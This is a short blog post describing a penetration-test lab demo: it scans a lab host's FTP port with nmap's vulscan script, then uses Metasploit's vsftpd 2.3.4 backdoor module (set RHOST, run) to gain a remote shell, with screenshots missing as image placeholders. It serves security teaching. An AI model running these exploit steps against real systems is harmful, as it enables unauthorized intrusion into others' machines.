Penetration Test - Select Your Attacks(4)

FTP Exploit Demo

Use Nmap to find the vulnerability.

nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV -p 21 10.0.0.19

image-20200916204505175

Use metasploit-framework to run the exploit.

cd /usr/share/metasploit-framework/

image-20200916204852647

cd modules/exploits/unix/ftp

image-20200916205246399

msfconsole

image-20200916205447124

use exploits/unix/ftp/vsftpd_234_backdoor

image-20200916205802418

set RHOST 10.0.0.19

image-20200916210022003

run

image-20200916210123610

We can run the shell commands now.

image-20200916210337444

QUICK REVIEW
  • FTP exploits can open a backdoor to a victim's computer
  • FTP itself can be vulnerable
  • In this example, FTP opened a backdoor to the victim computer
posted @ 2020-09-16 21:06  晨风_Eric  阅读(106)  评论(0编辑  收藏  举报